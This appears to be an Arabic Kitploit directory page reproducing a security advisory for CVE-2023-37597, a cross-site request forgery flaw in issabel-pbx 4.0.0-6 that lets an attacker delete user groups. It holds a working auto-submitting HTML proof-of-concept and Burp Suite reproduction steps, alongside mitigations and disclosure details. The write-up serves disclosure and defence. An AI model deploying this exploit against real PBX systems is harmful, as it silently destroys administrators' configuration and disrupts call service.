Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-37597 — يحتوي Issabel-pbx v 4.0.0-6 على ثغرة أمنية من نوع تزوير الطلبات عبر المواقع (CSRF) في وظيفة إدارة مجموعات المستخدمين. | Kitploit
أدوات/GitHubGitHub/sahiloj/cve-2023-37597
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالأوراق والأبحاثالتعلم والتعليم
GitHubsahiloj/cve-2023-37597

CVE-2023-37597

يحتوي Issabel-pbx v 4.0.0-6 على ثغرة أمنية من نوع تزوير الطلبات عبر المواقع (CSRF) في وظيفة إدارة مجموعات المستخدمين.

عرض المستودع
11منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-37597 — issabel-pbx 4.0.0-6: تزوير الطلب عبر المواقع (CSRF) — حذف مجموعة المستخدمين

إخلاء مسؤولية: هذا المستودع مخصص للأغراض التعليمية والبحث الأمني المصرح به فقط. لا تستخدم هذا الاستغلال ضد أي نظام لا تملكه أو ليس لديك إذن كتابي صريح لاختباره.


جدول المحتويات

  • نظرة عامة
  • تفاصيل الثغرة
  • المنتج المتأثر
  • التحليل الفني
  • سيناريو الهجوم
  • إثبات المفهوم (PoC)
    • خطوات إعادة الإنتاج
    • كود استغلال PoC
  • الأثر
  • التخفيف والمعالجة
  • الجدول الزمني للإفصاح
  • المراجع
  • المؤلف

نظرة عامة

issabel-pbx عبارة عن منصة اتصالات موحّدة مفتوحة المصدر تُستخدم على نطاق واسع (PBX) توفر خدمات VoIP وإدارة الهاتف والإدارة عبر الويب. تحتوي النسخة 4.0.0-6 من issabel-pbx على ثغرة تزوير الطلب عبر المواقع (CSRF) في وظيفة إدارة مجموعات المستخدمين.

يمكن لمهاجم خارجي غير مصادق إنشاء صفحة HTML خبيثة، وعندما يزورها مسؤول مصادق، ترسل الصفحة طلب HTTP POST مزيّفًا بصمت لحذف أي مجموعة مستخدمين. وبما أن التطبيق لا يتحقق من مصدر الطلبات التي تغيّر الحالة عبر رموز CSRF أو سياسات ملفات تعريف الارتباط SameSite، فإن المتصفح يرفق تلقائيًا ملف تعريف ارتباط الجلسة الخاص بالمسؤول، مما يؤدي إلى نجاح الحذف دون علم الضحية أو موافقتها.


تفاصيل الثغرة


المنتج المتأثر


التحليل الفني

ما هو CSRF؟

تزوير الطلب عبر المواقع (CSRF) هو هجوم يخدع متصفح الضحية لإرسال طلب موثّق إلى تطبيق مستهدف نيابةً عن المهاجم. ينجح الهجوم عندما:

  1. يكون لدى الضحية جلسة مصادقة نشطة مع التطبيق المستهدف.
  2. يعتمد التطبيق فقط على ملفات تعريف ارتباط الجلسة لمصادقة الطلبات (أي لا يوجد رمز CSRF، ولا تحقق من Origin/Referer، ولا سمة SameSite=Strict أو SameSite=Lax لملف تعريف الارتباط).
  3. يستطيع المهاجم التنبؤ ببنية الطلب الذي يغيّر الحالة.

السبب الجذري

تعالج نقطة نهاية حذف مجموعة المستخدمين (/index.php?menu=grouplist) في issabel-pbx 4.0.0-6 طلبات HTTP POST التي تحتوي فقط على إجراء delete ومعامل id_user. لا يقوم التطبيق بـ:

  • توليد أو التحقق من رمز المزامنة (المضاد لـ CSRF).
  • فحص ترويسات HTTP Origin أو Referer.
  • تعيين سمة SameSite على ملفات تعريف ارتباط الجلسة.

ونتيجة لذلك، يمكن لأي صفحة ويب يتم تحميلها في متصفح الضحية أن ترسل بصمت نموذج الحذف باستخدام جلسة الضحية الحالية، لأن المتصفح سيرفق تلقائيًا ملف تعريف ارتباط الجلسة.

نقطة النهاية المعرضة للخطر

root@kitploit:~
POST /index.php?menu=grouplist HTTP/1.1
Host: <Issabel IP>

delete=Delete&id_user=<USER_GROUP_ID>

سيناريو الهجوم

  1. يصمم المهاجم صفحة HTML خبيثة تحتوي على نموذج مخفي يرسل طلب الحذف عبر POST إلى لوحة تحكم Issabel.
  2. يوصل المهاجم الصفحة إلى مسؤول Issabel مصادق — عبر بريد تصيد، أو رابط في رسالة دردشة، أو `` مضمّن في صفحة مخترقة.
  3. متصفح الضحية يقوم بتحميل الصفحة. يرسل JavaScript النموذج تلقائيًا، أو تقع الضحية ضحية الهندسة الاجتماعية وتضغط على زر "إرسال" مزيف.
  4. خادم Issabel يستقبل طلب POST صالحًا مع ملف تعريف ارتباط جلسة المسؤول ويحذف مجموعة المستخدمين المستهدفة دون أي تأكيد إضافي أو تحقق من الرمز.
  5. تتم إزالة مجموعة المستخدمين نهائيًا، مما قد يعطل توجيه المكالمات، والتحكم في الوصول، وجميع المستخدمين الذين يعتمدون على تلك المجموعة — بشكل فعّال يسبب حرمانًا من الخدمة على مستوى التطبيق.

إثبات المفهوم (PoC)

تحذير: يُقدَّم إثبات المفهوم التالي للأغراض التعليمية فقط. استخدمه فقط في بيئات المختبرات أو الأنظمة التي لديك إذن صريح لاختبارها.

خطوات إعادة الإنتاج

الخطوة 1 — تسجيل الدخول إلى لوحة تحكم Issabel

انتقل إلى صفحة قائمة مجموعات المستخدمين وسجّل الدخول باستخدام بيانات اعتماد المسؤول.

root@kitploit:~
https://{Issabel IP}/index.php?menu=grouplist&action=view&id=11

لوحة تحكم المسؤول — قائمة مجموعات المستخدمين


الخطوة 2 — التقاط طلب الحذف

حاول حذف مجموعة مستخدمين أثناء تمرير حركة المرور عبر Burp Suite. انقر بزر الماوس الأيمن على طلب POST المُلتقط واختر Engagement Tools → Generate CSRF PoC لإنشاء الهيكل الأساسي لاستغلال HTML.

Burp Suite — طلب الحذف المُلتقط


الخطوة 3 — استضافة صفحة استغلال CSRF

احفظ HTML المُنشأ كملف (انظر كود استغلال PoC أدناه). استضفه على خادم يتحكم فيه المهاجم، أو أرسله مباشرة إلى الضحية.


الخطوة 4 — فتح الضحية لصفحة الاستغلال

عندما يفتح المسؤول المصادق رابط الاستغلال أو تتم إعادة توجيهه إليه، يتم إرسال النموذج المخفي تلقائيًا (أو تنقر الضحية على الزر الطُعمي). يتم حذف مجموعة المستخدمين المستهدفة من لوحة التحكم.

تم إرسال الاستغلال — تم حذف المجموعة (قبل)

تم إرسال الاستغلال — تم حذف المجموعة (بعد)


كود استغلال PoC

يوضح ملف HTML التالي (متاح أيضًا باسم CSRF exploit.html) الهجوم. استبدل {Issabel IP} بالمضيف الهدف واضبط id_user ليطابق معرف المجموعة التي تريد حذفها.

root@kitploit:~
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://{Issabel IP}/index.php?menu=grouplist" method="POST">
      <input type="hidden" name="delete" value="Delete" />
      <input type="hidden" name="id_user" value="7" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

نسخة الإرسال التلقائي: لإلغاء الحاجة إلى نقر الضحية على أي شيء، أضف السطر التالي داخل وسم <body> بحيث يُرسل النموذج تلقائيًا عند تحميل الصفحة:

root@kitploit:~
<script>document.forms[0].submit();</script>

الأثر

البعدالوصف
السلامة (Integrity)يمكن للمهاجم حذف أي مجموعة مستخدمين بصمت من لوحة تحكم Issabel.
التوفر (Availability)يؤدي حذف مجموعات المستخدمين إلى تعطيل قواعد توجيه المكالمات، والتحكم في الوصول، وخدمات الهاتفة لجميع المستخدمين المنتمين إلى تلك المجموعات، بما يعادل حرمانًا جزئيًا من الخدمة.
السرية (Confidentiality)لا تتأثر مباشرة بهذه الثغرة.

التخفيف والمعالجة

يجب على المسؤولين والمطوّرين تطبيق الدفاعات التالية:

  1. تنفيذ رموز CSRF (نمط رمز المزامنة)

    • قم بتوليد رمز فريد وغير قابل للتنبؤ لكل جلسة (أو لكل طلب) لكل نموذج يغيّر الحالة.
    • تحقق من الرمز في الخادم قبل معالجة أي عملية POST/PUT/DELETE.
  2. تعيين سمة SameSite لملف تعريف الارتباط

    • اضبط ملفات تعريف ارتباط الجلسة باستخدام SameSite=Lax (الحد الأدنى) أو SameSite=Strict لمنع الطلبات عبر المواقع من حمل بيانات اعتماد الجلسة.
    • مثال لترويسة الاستجابة: Set-Cookie: PHPSESSID=...; SameSite=Lax; Secure; HttpOnly
  3. التحقق من ترويسات Origin و Referer

    • في الخادم، ارفض الطلبات التي لا تتطابق ترويسة Origin أو Referer فيها مع نطاق التطبيق نفسه.
  4. طلب إعادة المصادقة للإجراءات التدميرية

    • اطلب من المسؤول تأكيد كلمة المرور قبل حذف المجموعات أو تنفيذ عمليات تدميرية أخرى.
  5. تطبيق الدفاع في العمق

    • استخدم قاعدة جدار حماية تطبيق الويب (WAF) لحظر طلبات POST غير المتوقعة عبر المواقع إلى نقاط النهاية الحساسة.

الجدول الزمني للإفصاح

التاريخالحدث
10 يوليو 2023تم اكتشاف الثغرة وتوثيقها بواسطة Sahil Ojha
10 يوليو 2023تم تعيين CVE-2023-37597
10 يوليو 2023الإفصاح العلني

المراجع

  • NVD — CVE-2023-37597
  • OWASP — Cross-Site Request Forgery (CSRF)
  • OWASP CSRF Prevention Cheat Sheet
  • CWE-352: Cross-Site Request Forgery (CSRF)
  • Issabel Foundation — issabelPBX

المؤلف

Sahil Ojha باحث أمني

إذا وجدت هذا البحث مفيدًا، فلا تتردد في ⭐ وضع نجمة على المستودع.

تنزيل الأداة
الحقلالقيمة
معرّف CVECVE-2023-37597
الثغرةتزوير الطلب عبر المواقع (CSRF)
CWECWE-352 — تزوير الطلب عبر المواقع (CSRF)
الخطورةمتوسطة
متجه CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
النسخة المتأثرةissabel-pbx 4.0.0-6
تم الإفصاح10 يوليو 2023
الباحثSahil Ojha
الحقلالقيمة
اسم المنتجissabel-pbx
النسخة4.0.0-6
البائعIssabel Foundation
الصفحة الرئيسية للبائعhttps://www.issabel.org/
الكود المصدريhttps://github.com/IssabelFoundation/issabelPBX
تم الاختبار علىWindows (Burp Suite Community Edition)